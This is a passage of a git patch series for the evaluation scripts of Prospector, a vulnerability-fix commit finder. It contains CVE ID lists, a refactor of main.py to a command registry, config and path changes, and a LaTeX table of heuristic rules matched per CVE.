"CVE-2014-8176", + "CVE-2014-8547", + "CVE-2014-8548", + "CVE-2014-8549", + "CVE-2014-8650", + "CVE-2014-8991", + "CVE-2014-9720", + "CVE-2014-10068", + "CVE-2014-10077", + "CVE-2015-0204", + "CVE-2015-0205", + "CVE-2015-0206", + "CVE-2015-0208", + "CVE-2015-0209", + "CVE-2015-0286", + "CVE-2015-0287", + "CVE-2015-0288", + "CVE-2015-0289", + "CVE-2015-0290", + "CVE-2015-0292", + "CVE-2015-0293", + "CVE-2015-1208", + "CVE-2015-1788", + "CVE-2015-1789", + "CVE-2015-1791", + "CVE-2015-1792", + "CVE-2015-1793", + "CVE-2015-1830", + "CVE-2015-2068", + "CVE-2015-2156", + "CVE-2015-2296", + "CVE-2015-2912", + "CVE-2015-2913", + "CVE-2015-3010", + "CVE-2015-3192", + "CVE-2015-3193", + "CVE-2015-3195", + "CVE-2015-3196", + "CVE-2015-3197", + "CVE-2015-3253", + "CVE-2015-3395", + "CVE-2015-3996", + "CVE-2015-4053", + "CVE-2015-4706", + "CVE-2015-5159", + "CVE-2015-5207", + "CVE-2015-5211", + "CVE-2015-5241", + "CVE-2015-5250", + "CVE-2015-5253", + "CVE-2015-5254", + "CVE-2015-5305", + "CVE-2015-5344", + "CVE-2015-5349", + "CVE-2015-5607", + "CVE-2015-6748", + "CVE-2015-6818", + "CVE-2015-6821", + "CVE-2015-6822", + "CVE-2015-6823", + "CVE-2015-6824", + "CVE-2015-6918", + "CVE-2015-7314", + "CVE-2015-7315", + "CVE-2015-7316", + "CVE-2015-7528", + "CVE-2015-7559", + "CVE-2015-8213", + "CVE-2015-8216", + "CVE-2015-8217", + "CVE-2015-8218", + "CVE-2015-8618", + "CVE-2015-8748", + "CVE-2015-8861", + "CVE-2015-8968", + "CVE-2015-9243", + "CVE-2015-9251", + "CVE-2016-0762", + "CVE-2016-1905", + "CVE-2016-2108", + "CVE-2016-2160", + "CVE-2016-2177", + "CVE-2016-2512", + "CVE-2016-2513", + "CVE-2016-2788", + "CVE-2016-3081", + "CVE-2016-3092", + "CVE-2016-3094", + "CVE-2016-3959", + "CVE-2016-4009", + "CVE-2016-4055", + "CVE-2016-4425", + "CVE-2016-4465", + "CVE-2016-4855", + "CVE-2016-4970", + "CVE-2016-4972", + "CVE-2016-5388", + "CVE-2016-6186", + "CVE-2016-6304", + "CVE-2016-6519", + "CVE-2016-6580", + "CVE-2016-6581", + "CVE-2016-6652", + "CVE-2016-6793", + "CVE-2016-6794", + "CVE-2016-6796", + "CVE-2016-6797", + "CVE-2016-6801", + "CVE-2016-6814", + "CVE-2016-6816", + "CVE-2016-6817", + "CVE-2016-6823", + "CVE-2016-7036", + "CVE-2016-7569", + "CVE-2016-8568", + "CVE-2016-8569", + "CVE-2016-8579", + "CVE-2016-8610", + "CVE-2016-8629", + "CVE-2016-8640", + "CVE-2016-8745", + "CVE-2016-8747", + "CVE-2016-8750", + "CVE-2016-8867", + "CVE-2016-9015", + "CVE-2016-9121", + "CVE-2016-9122", + "CVE-2016-9189", + "CVE-2016-9190", + "CVE-2016-9243", + "CVE-2016-9814", + "CVE-2016-9878", + "CVE-2016-9879", + "CVE-2016-10033", + "CVE-2016-10127", + "CVE-2016-10129", + "CVE-2016-10190", + "CVE-2016-10191", + "CVE-2016-10192", + "CVE-2016-10193", + "CVE-2016-10526", + "CVE-2016-10538", + "CVE-2016-10542", + "CVE-2016-10550", + "CVE-2016-10555", + "CVE-2016-10557", + "CVE-2016-10579", + "CVE-2016-10582", + "CVE-2016-10745", + "CVE-2016-10750", + "CVE-2016-1000232", + "CVE-2016-1000282", + "CVE-2017-0224", + "CVE-2017-0905", + "CVE-2017-0906", + "CVE-2017-0907", + "CVE-2017-0909", + "CVE-2017-0929", + "CVE-2017-2582", + "CVE-2017-2592", + "CVE-2017-2649", + "CVE-2017-2670", + "CVE-2017-3156", + "CVE-2017-4952", + "CVE-2017-4995", + "CVE-2017-5537", + "CVE-2017-5594", + "CVE-2017-5637", + "CVE-2017-5954", + "CVE-2017-7481", + "CVE-2017-7525", + "CVE-2017-7536", + "CVE-2017-7545", + "CVE-2017-7653", + "CVE-2017-7657", + "CVE-2017-7660", + "CVE-2017-7661", + "CVE-2017-7662", + "CVE-2017-7666", + "CVE-2017-7675", + "CVE-2017-7860", + "CVE-2017-7861", + "CVE-2017-7957", + "CVE-2017-8045", + "CVE-2017-8109", + "CVE-2017-8342", + "CVE-2017-8359", + "CVE-2017-9096", + "CVE-2017-9214", + "CVE-2017-9265", + "CVE-2017-9841", + "CVE-2017-10910", + "CVE-2017-11424", + "CVE-2017-11428", + "CVE-2017-11503", + "CVE-2017-11610", + "CVE-2017-12158", + "CVE-2017-12159", + "CVE-2017-12160", + "CVE-2017-12605", + "CVE-2017-12624", + "CVE-2017-12629", + "CVE-2017-12631", + "CVE-2017-12868", + "CVE-2017-12873", + "CVE-2017-14063", + "CVE-2017-14136", + "CVE-2017-14506", + "CVE-2017-14623", + "CVE-2017-14683", + "CVE-2017-15103", + "CVE-2017-15288", + "CVE-2017-15612", + "CVE-2017-15720", + "CVE-2017-15914", + "CVE-2017-16006", + "CVE-2017-16010", + "CVE-2017-16018", + "CVE-2017-16026", + "CVE-2017-16031", + "CVE-2017-16138", + "CVE-2017-16558", + "CVE-2017-16570", + "CVE-2017-16759", + "CVE-2017-16762", + "CVE-2017-16792", + "CVE-2017-17485", + "CVE-2017-17760", + "CVE-2017-17835", + "CVE-2017-17837", + "CVE-2017-18076", + "CVE-2017-18077", + "CVE-2017-18361", + "CVE-2017-18635", + "CVE-2017-1000001", + "CVE-2017-1000042", + "CVE-2017-1000056", + "CVE-2017-1000069", + "CVE-2017-1000070", + "CVE-2017-1000209", + "CVE-2017-1000246", + "CVE-2017-1000248", + "CVE-2017-1000427", + "CVE-2017-1000433", + "CVE-2017-1000450", + "CVE-2018-0737", + "CVE-2018-0953", + "CVE-2018-1067", + "CVE-2018-1114", + "CVE-2018-1193", + "CVE-2018-1199", + "CVE-2018-1259", + "CVE-2018-1272", + "CVE-2018-1273", + "CVE-2018-1274", + "CVE-2018-1284", + "CVE-2018-1304", + "CVE-2018-1314", + "CVE-2018-1336", + "CVE-2018-1339", + "CVE-2018-3711", + "CVE-2018-3728", + "CVE-2018-3743", + "CVE-2018-3758", + "CVE-2018-3777", + "CVE-2018-5773", + "CVE-2018-6517", + "CVE-2018-6596", + "CVE-2018-7212", + "CVE-2018-7489", + "CVE-2018-7575", + "CVE-2018-7711", + "CVE-2018-7750", + "CVE-2018-8006", + "CVE-2018-8008", + "CVE-2018-8009", + "CVE-2018-8014", + "CVE-2018-8017", + "CVE-2018-8025", + "CVE-2018-8027", + "CVE-2018-8030", + "CVE-2018-8037", + "CVE-2018-8038", + "CVE-2018-8039", + "CVE-2018-8088", + "CVE-2018-8097", + "CVE-2018-8315", + "CVE-2018-8359", + "CVE-2018-8416", + "CVE-2018-8465", + "CVE-2018-8473", + "CVE-2018-8510", + "CVE-2018-8541", + "CVE-2018-8899", + "CVE-2018-9856", + "CVE-2018-10237", + "CVE-2018-10862", + "CVE-2018-10912", + "CVE-2018-11039", + "CVE-2018-11040", + "CVE-2018-11087", + "CVE-2018-11248", + "CVE-2018-11307", + "CVE-2018-11627", + "CVE-2018-11647", + "CVE-2018-11758", + "CVE-2018-11761", + "CVE-2018-11762", + "CVE-2018-11775", + "CVE-2018-11777", + "CVE-2018-11784", + "CVE-2018-11786", + "CVE-2018-11787", + "CVE-2018-11788", + "CVE-2018-11797", + "CVE-2018-12022", + "CVE-2018-12023", + "CVE-2018-12537", + "CVE-2018-12540", + "CVE-2018-12544", + "CVE-2018-12608", + "CVE-2018-13790", + "CVE-2018-13863", + "CVE-2018-14040", + "CVE-2018-14042", + "CVE-2018-14371", + "CVE-2018-14574", + "CVE-2018-14635", + "CVE-2018-14642", + "CVE-2018-14731", + "CVE-2018-14774", + "CVE-2018-15727", + "CVE-2018-15756", + "CVE-2018-15758", + "CVE-2018-16468", + "CVE-2018-16471", + "CVE-2018-16733", + "CVE-2018-16837", + "CVE-2018-16859", + "CVE-2018-16876", + "CVE-2018-16886", + "CVE-2018-16984", + "CVE-2018-17057", + "CVE-2018-17175", + "CVE-2018-17246", + "CVE-2018-18074", + "CVE-2018-18206", + "CVE-2018-18854", + "CVE-2018-18893", + "CVE-2018-18926", + "CVE-2018-19133", + "CVE-2018-19351", + "CVE-2018-19352", + "CVE-2018-19370", + "CVE-2018-19620", + "CVE-2018-19787", + "CVE-2018-20000", + "CVE-2018-20227", + "CVE-2018-20745", + "CVE-2018-20756", + "CVE-2018-20834", + "CVE-2018-20975", + "CVE-2018-1000060", + "CVE-2018-1000088", + "CVE-2018-1000096", + "CVE-2018-1000118", + "CVE-2018-1000159", + "CVE-2018-1000539", + "CVE-2018-1000559", + "CVE-2018-1000613", + "CVE-2018-1000644", + "CVE-2018-1000665", + "CVE-2018-1000803", + "CVE-2018-1000809", + "CVE-2018-1000820", + "CVE-2018-1000822", + "CVE-2018-1000854", + "CVE-2018-1000855", + "CVE-2018-1000872", + "CVE-2018-1002101", + "CVE-2018-1002105", + "CVE-2018-1002150", + "CVE-2018-1002200", + "CVE-2018-1002203", + "CVE-2018-1002204", + "CVE-2018-1002205", + "CVE-2019-0194", + "CVE-2019-0201", + "CVE-2019-0210", + "CVE-2019-0226", + "CVE-2019-0228", + "CVE-2019-1001", + "CVE-2019-1552", + "CVE-2019-3465", + "CVE-2019-3498", + "CVE-2019-3774", + "CVE-2019-3799", + "CVE-2019-3808", + "CVE-2019-3810", + "CVE-2019-3847", + "CVE-2019-3850", + "CVE-2019-3888", + "CVE-2019-3894", + "CVE-2019-5018", + "CVE-2019-5421", + "CVE-2019-5448", + "CVE-2019-5477", + "CVE-2019-6802", + "CVE-2019-6975", + "CVE-2019-7313", + "CVE-2019-7537", + "CVE-2019-7644", + "CVE-2019-8903", + "CVE-2019-9153", + "CVE-2019-9154", + "CVE-2019-9155", + "CVE-2019-9512", + "CVE-2019-9826", + "CVE-2019-9942", + "CVE-2019-10071", + "CVE-2019-10072", + "CVE-2019-10086", + "CVE-2019-10094", + "CVE-2019-10158", + "CVE-2019-10174", + "CVE-2019-10184", + "CVE-2019-10206", + "CVE-2019-10219", + "CVE-2019-10246", + "CVE-2019-10247", + "CVE-2019-10249", + "CVE-2019-10255", + "CVE-2019-10354", + "CVE-2019-10641", + "CVE-2019-10754", + "CVE-2019-10763", + "CVE-2019-10766", + "CVE-2019-10768", + "CVE-2019-10770", + "CVE-2019-10773", + "CVE-2019-10774", + "CVE-2019-10806", + "CVE-2019-10874", + "CVE-2019-10912", + "CVE-2019-11016", + "CVE-2019-11082", + "CVE-2019-11244", + "CVE-2019-11245", + "CVE-2019-11269", + "CVE-2019-11289", + "CVE-2019-11325", + "CVE-2019-11328", + "CVE-2019-11405", + "CVE-2019-11458", + "CVE-2019-11470", + "CVE-2019-11808", + "CVE-2019-12041", + "CVE-2019-12086", + "CVE-2019-12203", + "CVE-2019-12245", + "CVE-2019-12308", + "CVE-2019-12313", + "CVE-2019-12387", + "CVE-2019-12418", + "CVE-2019-12419", + "CVE-2019-12422", + "CVE-2019-12423", + "CVE-2019-12617", + "CVE-2019-12748", + "CVE-2019-12781", + "CVE-2019-14262", + "CVE-2019-14280", + "CVE-2019-14838", + "CVE-2019-14892", + "CVE-2019-14933", + "CVE-2019-15062", + "CVE-2019-15477", + "CVE-2019-15482", + "CVE-2019-15483", + "CVE-2019-15484", + "CVE-2019-15485", + "CVE-2019-15486", + "CVE-2019-15587", + "CVE-2019-15599", + "CVE-2019-15608", + "CVE-2019-15782", + "CVE-2019-16060", + "CVE-2019-16097", + "CVE-2019-16145", + "CVE-2019-16403", + "CVE-2019-16768", + "CVE-2019-16770", + "CVE-2019-16772", + "CVE-2019-16774", + "CVE-2019-16782", + "CVE-2019-16869", + "CVE-2019-16884", + "CVE-2019-16942", + "CVE-2019-16943", + "CVE-2019-17206", + "CVE-2019-17223", + "CVE-2019-17359", + "CVE-2019-17383", + "CVE-2019-17426", + "CVE-2019-17554", + "CVE-2019-17563", + "CVE-2019-17569", + "CVE-2019-17632", + "CVE-2019-18841", + "CVE-2019-18886", + "CVE-2019-18887", + "CVE-2019-18888", + "CVE-2019-18923", + "CVE-2019-18954", + "CVE-2019-19118", + "CVE-2019-19274", + "CVE-2019-19316", + "CVE-2019-19325", + "CVE-2019-19844", + "CVE-2019-19919", + "CVE-2019-20444", + "CVE-2019-1000007", + "CVE-2019-1002101", + "CVE-2019-1010142", + "CVE-2019-1010306", + "CVE-2020-1935", + "CVE-2020-1937", + "CVE-2020-1938", + "CVE-2020-1940", + "CVE-2020-5215", + "CVE-2020-5223", + "CVE-2020-5230", + "CVE-2020-5233", + "CVE-2020-5237", + "CVE-2020-5243", + "CVE-2020-5245", + "CVE-2020-5247", + "CVE-2020-5310", + "CVE-2020-5311", + "CVE-2020-5312", + "CVE-2020-5313", + "CVE-2020-5398", + "CVE-2020-6802", + "CVE-2020-6816", + "CVE-2020-7212", + "CVE-2020-7219", + "CVE-2020-7596", + "CVE-2020-7598", + "CVE-2020-7608", + "CVE-2020-8116", + "CVE-2020-8134", + "CVE-2020-8840", + "CVE-2020-8945", + "CVE-2020-9402", + "CVE-2020-9546", + "CVE-2020-9547", + "CVE-2020-9548", + "CVE-2020-10594" + ], + "aborted": [ + "CVE-2009-0217", + "CVE-2015-1169", + "CVE-2015-3208", + "CVE-2015-6826", + "CVE-2015-7577", + "CVE-2016-5386", + "CVE-2017-5643", + "CVE-2017-8658", + "CVE-2017-14695", + "CVE-2018-10055", + "CVE-2018-11804", + "CVE-2018-20713", + "CVE-2018-1002102", + "CVE-2019-10154" + ], + "missing": [ + "CVE-2009-0217", + "CVE-2015-1169", + "CVE-2015-3208", + "CVE-2015-6826", + "CVE-2015-7577", + "CVE-2016-5386", + "CVE-2017-5643", + "CVE-2017-8658", + "CVE-2017-14695", + "CVE-2018-10055", + "CVE-2018-11804", + "CVE-2018-20713", + "CVE-2018-1002102", + "CVE-2019-10154" + ] + } } ] } \ No newline at end of file diff --git a/prospector/evaluation/main.py b/prospector/evaluation/main.py index d28c24b24..28ff8bc2f 100644 --- a/prospector/evaluation/main.py +++ b/prospector/evaluation/main.py @@ -1,10 +1,7 @@ -# flake8: noqa -import argparse -import asyncio -import os import signal import sys - +from typing import Callable, Dict +from omegaconf import OmegaConf from evaluation.analyse import ( analyse_category_flows, analyse_prospector_reports, @@ -14,178 +11,100 @@ ) from evaluation.analyse_statistics import ( analyse_statistics, - candidates_execution_time, - commit_classification_time, overall_execution_time, ) -from evaluation.dispatch_jobs import ( - dispatch_jobs_with_api, - dispatch_prospector_jobs, - empty_queue, - start, -) +from evaluation.dispatch_jobs import dispatch_prospector_jobs, empty_queue +from evaluation.utils import config -def parse_cli_args(args): - parser = argparse.ArgumentParser(description="Prospector scripts") +class CommandRegistry: + def __init__(self): + self.commands: Dict[str, Callable] = {} - parser.add_argument( - "-i", - "--input", - type=str, - help="Input file", - ) + def register(self, name: str): + def decorator(func: Callable): + self.commands[name] = func + return func - parser.add_argument( - "-e", - "--execute", - action="store_true", - help="Input file", - ) + return decorator - parser.add_argument( - "-a", - "--analyze", - action="store_true", - help="Input file", - ) + def execute(self, name: str, *args, **kwargs): + if name not in self.commands: + raise ValueError(f"Command '{name}' not found") + return self.commands[name](*args, **kwargs) - parser.add_argument( - "-s", - "--stats", - action="store_true", - help="Analyse the statistics field saved in each Prospector report.", - ) - parser.add_argument( - "-f", - "--folder", - type=str, - help="Folder to analyze", - ) +registry = CommandRegistry() - parser.add_argument( - "-c", - "--cve", - type=str, - default="", - help="CVE to analyze", - ) - parser.add_argument( - "-eq", - "--empty-queue", - help="Empty the Redis Queue", - action="store_true", - ) +@registry.register("execute") +def execute_command(config): + dispatch_prospector_jobs(config.input, config.cve) - parser.add_argument( - "-co", - "--count", - help="Count which CVEs from the input data have a corresponding Prospector report.", - action="store_true", - ) - parser.add_argument( - "-fl", - "--flow", - help="Analyse which CVEs changed from one category to another given two detailed summary execution JSON files.", - action="store_true", - ) +@registry.register("analyse_reports") +def analyze_reports_command(config): + analyse_prospector_reports(config.input, config.cve) - parser.add_argument( - "-t", - "--temporary", - help="Run whichever temporary function is set to temporary. This allows you to write use-once function and run it easily.", - action="store_true", - ) - - parser.add_argument( - "-cm", - "--checkmarks", - action="store_true", - ) - return parser.parse_args() +@registry.register("analyse_statistics") +def analyze_stats_command(config): + analyse_statistics(config.input) -async def main(argv): - args = parse_cli_args(argv) +@registry.register("execution_time") +def execution_time_command(config): + overall_execution_time(config.input) - # Run Prospector containerised - if args.execute and not args.analyze: - dispatch_prospector_jobs(args.input, args.cve) - # await dispatch_jobs_with_api(args.input, args.cve) - # start() - elif args.analyze and not args.execute: - # analysis of execution statistics in report - if args.stats: - # analyse_statistics(args.input) - overall_execution_time(args.input) - # commit_classification_time(args.input) - # candidates_execution_time(args.input) +@registry.register("category_flows") +def category_flows_command(config): + analyse_category_flows() - elif args.flow: - analyse_category_flows() - # analyse_category_flows_no_mutual_exclusion() - # analysis of Prospector reports - elif args.checkmarks: - generate_checkmarks_table(args.input, args.cve) - else: - analyse_prospector_reports(args.input, args.cve) +@registry.register("checkmarks") +def checkmarks_command(config): + generate_checkmarks_table(config.input, config.cve) - # Remove all jobs from the queue - elif args.empty_queue and not args.execute and not args.stats: - empty_queue() - # Count how many reports there are or there are missing - elif not args.analyze and not args.execute and args.count: - count_existing_reports(args.input) +@registry.register("empty_queue") +def empty_queue_command(config): + empty_queue() - elif not args.analyze and not args.execute and args.temporary: - # difference_ground_truth_datasets() - # generate_sankey_diagram("mvi_old_reports", "mvi_old_code", "mvi_without_llm") - generate_sankey_diagram( - "mvi_old_reports", - "mvi_old_reports(new_categories)", - "mvi_without_llm", - ) - # candidates_execution_time(args.input) - # overall_execution_time(args.input) - # Cannot choose both analyse and execute, stop here. - elif args.analyze and args.execute: - sys.exit("Choose either to execute or analyze") +@registry.register("count_reports") +def count_reports_command(config): + count_existing_reports(config.input) -def mute(): - sys.stdout = open(os.devnull, "w") +@registry.register("sankey_diagram") +def sankey_diagram_command(config): + generate_sankey_diagram( + "mvi_old_reports", + "mvi_old_reports(new_categories)", + "mvi_without_llm", + ) -def list_dir_and_select_folder(): - files = [file for file in os.listdir("datasets/") if "." not in file] - for i, file in enumerate(files): - print(i, ")", file) - choice = int(input("Choose a dataset: ")) - return files[choice] +def sig_handler(signum, frame): + print("You pressed Ctrl+C!") + sys.exit(0) -def list_dir_and_select_dataset(): - files = [file for file in os.listdir("datasets/") if file.endswith(".csv")] - for i, file in enumerate(files): - print(i, ")", file) - choice = int(input("Choose a dataset: ")) - return files[choice] +def main(): + if len(sys.argv) < 2: + print("Usage: python script.py ") + sys.exit(1) + command = sys.argv[1] -# this method handls ctrl+c from the keyboard to stop execution -def sig_handler(signum, frame): - print("You pressed Ctrl+C!") - sys.exit(0) + try: + registry.execute(command, config) + except ValueError as e: + print(f"Error: {e}") + sys.exit(1) if __name__ == "__main__": signal.signal(signal.SIGINT, sig_handler) - asyncio.run(main(sys.argv[1:])) + main() From 5642c5f34db717c35682ec518e4ff4854759a9d3 Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 30 Aug 2024 09:41:17 +0000 Subject: [PATCH 128/130] [IMP] adjust config.yaml file to structure changes from last commit --- prospector/evaluation/config-sample.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/prospector/evaluation/config-sample.yaml b/prospector/evaluation/config-sample.yaml index ae1b32d4c..471dea745 100644 --- a/prospector/evaluation/config-sample.yaml +++ b/prospector/evaluation/config-sample.yaml @@ -6,11 +6,14 @@ input_data_path: evaluation/data/input/ # datasets to run prospector on (CSV: ID # directory to where the batches of reports are to be found reports_directory: ../../../data/prospector_reports/ +# filename of the ground truth dataset file +input: tracer # Prospector Batch Selection version_interval: true llm_support: true batch: regular # regular, old_code, old_reports +cves: all # optionally select a subset of CVEs, eg. CVE-2020-1925 to only execute on this CVE # compare reports selected above to compare_directory: ../../../data/prospector_reports/nvi_with_llm/ From b56718c7231d997e9f7ec09557d0e5396e39c60a Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 30 Aug 2024 12:13:55 +0000 Subject: [PATCH 129/130] [IMP] adjusted all files and functions to the new registry pattern --- prospector/evaluation/analyse.py | 32 +- .../summary_execution_checkmarks_table.tex | 568 +++++ .../summary_execution_flow-analysis.json | 2007 +++++++++++++++++ .../results/summary_execution_mvi_table.tex | 24 +- .../summary_execution_mvi_without_llm.json | 1996 ++++++++++++++++ prospector/evaluation/utils.py | 2 +- 6 files changed, 4603 insertions(+), 26 deletions(-) create mode 100644 prospector/evaluation/data/results/summary_execution_checkmarks_table.tex create mode 100644 prospector/evaluation/data/results/summary_execution_flow-analysis.json create mode 100644 prospector/evaluation/data/results/summary_execution_mvi_without_llm.json diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index 61b50f4aa..c1db5590e 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -60,11 +60,16 @@ def analyse_prospector_reports(filename: str, selected_cves: str): - """Analyses Prospector reports. Creates the summary_execution_results table.""" + """Analyses Prospector reports and categorises them into high, medium, + low ... categories given a ground truth. + + Creates the summary_execution_[mvi|nvi]_table.tex table. + Creates a JSON file with a list of CVE IDs for each category of the table. These files are used for the flow analysis (`analyse_category_flows()`). + + """ file = INPUT_DATA_PATH + filename + ".csv" dataset = load_dataset(file) - # dataset = dataset[:100] # Actual line number in D53.csv -2 - # dataset = dataset[198:199] # Actual line number in D53.csv -2 + if selected_cves != "all" and len(selected_cves) != 0: dataset = [c for c in dataset if c[0] in selected_cves] @@ -312,7 +317,8 @@ def _save_summary_execution_details( def count_existing_reports(data_filepath): - """Prints which CVEs reports are missing for to the console.""" + """Prints which CVEs reports are missing for given the ground truth dataset + to the console.""" file = INPUT_DATA_PATH + data_filepath + ".csv" dataset = load_dataset(file) @@ -347,13 +353,13 @@ def analyse_category_flows(): """ summary_execution_file = ( ANALYSIS_RESULTS_PATH - + "summary_execution/" + + "summary_execution_" + PROSPECTOR_REPORTS_PATH_HOST.split("/")[-2] + ".json" ) summary_execution_comparison_file = ( ANALYSIS_RESULTS_PATH - + "summary_execution/" + + "summary_execution_" + COMPARISON_DIRECTORY.split("/")[-2] + ".json" ) @@ -378,7 +384,7 @@ def analyse_category_flows(): save_dict_to_json( output_data, - f"{ANALYSIS_RESULTS_PATH}summary_execution/flow-analysis.json", + f"{ANALYSIS_RESULTS_PATH}summary_execution_flow-analysis.json", ) @@ -548,7 +554,7 @@ def generate_checkmarks_table(input_dataset: str, selected_cves): file = INPUT_DATA_PATH + input_dataset + ".csv" dataset = load_dataset(file) - if len(selected_cves) != 0: + if selected_cves != "all" and len(selected_cves) != 0: dataset = [c for c in dataset if c[0] in selected_cves] for record in tqdm(dataset, total=len(dataset), desc="Analysing Records"): @@ -627,7 +633,7 @@ def generate_checkmarks_table(input_dataset: str, selected_cves): # Write the content to the output file with open( - ANALYSIS_RESULTS_PATH + "summary_execution/checkmarks_table.tex", "w" + ANALYSIS_RESULTS_PATH + "summary_execution_checkmarks_table.tex", "w" ) as file: file.writelines(latex_content) @@ -639,13 +645,13 @@ def _calculate_total_relevance(commit): def generate_sankey_diagram(file1: str, file2: str, file3: str): # Load JSON data summary_execution_file_1 = ( - ANALYSIS_RESULTS_PATH + "summary_execution/" + file1 + ".json" + ANALYSIS_RESULTS_PATH + "summary_execution_" + file1 + ".json" ) summary_execution_file_2 = ( - ANALYSIS_RESULTS_PATH + "summary_execution/" + file2 + ".json" + ANALYSIS_RESULTS_PATH + "summary_execution_" + file2 + ".json" ) summary_execution_file_3 = ( - ANALYSIS_RESULTS_PATH + "summary_execution/" + file3 + ".json" + ANALYSIS_RESULTS_PATH + "summary_execution_" + file3 + ".json" ) summary1 = load_json_file(summary_execution_file_1) @@ -780,7 +786,7 @@ def generate_sankey_diagram(file1: str, file2: str, file3: str): ) output_file = ( - ANALYSIS_RESULTS_PATH + "plots/" + f"sankey-{file1}-{file2}-{file3}.png" + ANALYSIS_RESULTS_PATH + f"sankey-{file1}-{file2}-{file3}.png" ) # Save as PNG write_image(fig, output_file) diff --git a/prospector/evaluation/data/results/summary_execution_checkmarks_table.tex b/prospector/evaluation/data/results/summary_execution_checkmarks_table.tex new file mode 100644 index 000000000..e6c87ad4e --- /dev/null +++ b/prospector/evaluation/data/results/summary_execution_checkmarks_table.tex @@ -0,0 +1,568 @@ +\begin{longtabu} to \textwidth { c | c | c | c | c | c | c | c | c | c | c | c | c | c | c | c | c | c | c | c } +\caption{Matched rules for each fixing commit}\\ + \toprule + & \rot{VULN\_ID\_IN\_MESSAGE} & \rot{XREF\_BUG} & \rot{XREF\_GH} & \rot{COMMIT\_IN\_REFERENCE} & \rot{COMMIT\_IS\_SECURITY\_RELEVANT} & \rot{VULN\_ID\_IN\_LINKED\_ISSUE} & \rot{CHANGES\_RELEVANT\_FILES} & \rot{CHANGES\_RELEVANT\_CODE} & \rot{RELEVANT\_WORDS\_IN\_MESSAGE} & \rot{ADV\_KEYWORDS\_IN\_FILES} & \rot{ADV\_KEYWORDS\_IN\_MSG} & \rot{SEC\_KEYWORDS\_IN\_MESSAGE} & \rot{SEC\_KEYWORDS\_IN\_LINKED\_GH} & \rot{SEC\_KEYWORDS\_IN\_LINKED\_BUG} & \rot{GITHUB\_ISSUE\_IN\_MESSAGE} & \rot{BUG\_IN\_MESSAGE} & \rot{COMMIT\_HAS\_TWINS} & \rot{Total Execution Time} & \rot{LLM Execution Time} \\ \midrule + CVE-2010-5312 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & \checkmark & & & 7.71 & 0.15\\ \midrule +CVE-2011-1950 & & & & & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & \checkmark & & & 24.3 & 21.09\\ \midrule +CVE-2011-2765 & & & & \checkmark & \checkmark & & & & & \checkmark & \checkmark & \checkmark & & & \checkmark & & & 3.9 & 0.12\\ \midrule +CVE-2011-3186 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & & 7.05 & 0.16\\ \midrule +CVE-2011-3923 & & & & & \checkmark & & & & & & \checkmark & \checkmark & & & & & & 26.98 & 23.07\\ \midrule +CVE-2011-4030 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & & 3.92 & 0.13\\ \midrule +CVE-2011-4461 & & & & \checkmark & \checkmark & & & & & & \checkmark & \checkmark & & & & & & 4.05 & 0.17\\ \midrule +CVE-2012-1109 & & & & \checkmark & & & & & & & \checkmark & & & & \checkmark & & & 2.05 & 0.13\\ \midrule +CVE-2012-1176 & & & \checkmark & \checkmark & \checkmark & & & \checkmark & \checkmark & & \checkmark & & & & \checkmark & & & 15.12 & 0.08\\ \midrule +CVE-2012-2417 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & \checkmark & & & 9.48 & 0.58\\ \midrule +CVE-2012-3366 & & & & \checkmark & \checkmark & & & & & \checkmark & \checkmark & \checkmark & & & & & & 4.92 & 0.49\\ \midrule +CVE-2012-3408 & & & & \checkmark & \checkmark & & \checkmark & & & \checkmark & & & & & & & & 2.82 & 0.16\\ \midrule +CVE-2012-3458 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & & & & & & 3.45 & 0.17\\ \midrule +CVE-2012-3536 & & & & & \checkmark & & & & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & 20.36 & 17.69\\ \midrule +CVE-2012-5812 & & & & & \checkmark & & & \checkmark & \checkmark & & \checkmark & & & & & & & 1.76 & 0.17\\ \midrule +CVE-2012-6550 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & 2.19 & 0.18\\ \midrule +CVE-2013-0256 & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & 4.2 & 0.3\\ \midrule +CVE-2013-0294 & & & & \checkmark & \checkmark & & \checkmark & & & & & & & & & & & 8.21 & 0.02\\ \midrule +CVE-2013-1607 & & & & & \checkmark & & & & & & & & & & & & & 2.29 & 0.16\\ \midrule +CVE-2013-1800 & & & & \checkmark & \checkmark & & & \checkmark & & & \checkmark & & & & & & & 3.73 & 0.05\\ \midrule +CVE-2013-1801 & & & & \checkmark & \checkmark & & & \checkmark & & & \checkmark & \checkmark & & & & & & 2.42 & 0.17\\ \midrule +CVE-2013-1879 & & \checkmark & & & \checkmark & & \checkmark & & & \checkmark & \checkmark & \checkmark & & \checkmark & & \checkmark & & 7.22 & 4.67\\ \midrule +CVE-2013-1880 & & \checkmark & & & \checkmark & & \checkmark & & & \checkmark & \checkmark & \checkmark & & \checkmark & & \checkmark & & 24.23 & 20.83\\ \midrule +CVE-2013-2013 & & & & \checkmark & \checkmark & & & & & & \checkmark & \checkmark & & & \checkmark & & & 4.07 & 0.16\\ \midrule +CVE-2013-2035 & & & & \checkmark & & & \checkmark & \checkmark & & \checkmark & & & & & & & & 3.21 & 0.08\\ \midrule +CVE-2013-2191 & \checkmark & & & \checkmark & \checkmark & & & & \checkmark & & \checkmark & & & & & & & 4.48 & 0.17\\ \midrule +CVE-2013-3300 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & \checkmark & 1.74 & 0.16\\ \midrule +CVE-2013-3567 & & & & & & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & \checkmark & & \checkmark & 29.82 & 